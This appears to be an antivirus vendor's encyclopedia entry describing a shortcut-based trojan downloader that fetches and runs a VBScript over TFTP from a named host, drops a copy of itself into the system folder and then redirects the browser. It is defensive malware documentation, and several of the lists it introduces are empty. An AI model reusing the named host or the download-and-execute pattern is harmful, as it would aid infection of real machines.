Threat behavior
TrojanDownloader:BAT/Lnkget.AQ is a detection for a shortcut link that, when opened, connects to a remote server using TFTP (Trivial File Transfer Protocol) to download and execute arbitrary VBScript files.
Installation
TrojanDownloader:BAT/Lnkget.AQ may arrive on a computer either by being dropped or downloaded by other malware. When run, it attempts to connect to a TFTP server to download and execute arbitrary VBScript files.
Payload
Downloads and executes arbitrary files
TrojanDownloader:BAT/Lnkget.AQ attempts to download a VBScript file from the remote server "w11e.com" over TFTP. This file is saved as "%windir%\P.vbs" and then executed.
Additional information
TrojanDownloader:BAT/Lnkget.AQ runs a VBScript (detected as
TrojanDownloader:VBS/Small.AM), and contacts the TFTP server "
w11e.com" to download and execute the following file:
When run, this malware drops a copy of itself under the <system folder> directory, with a file name consisting of five random characters. In the wild, we have observed the malware using the following file names:
Note: <system folder> refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.
Once the trojan has completed its downloading routine, it redirects to the following site:
tw.match.yahoo.com
Analysis by Wei Li
Prevention
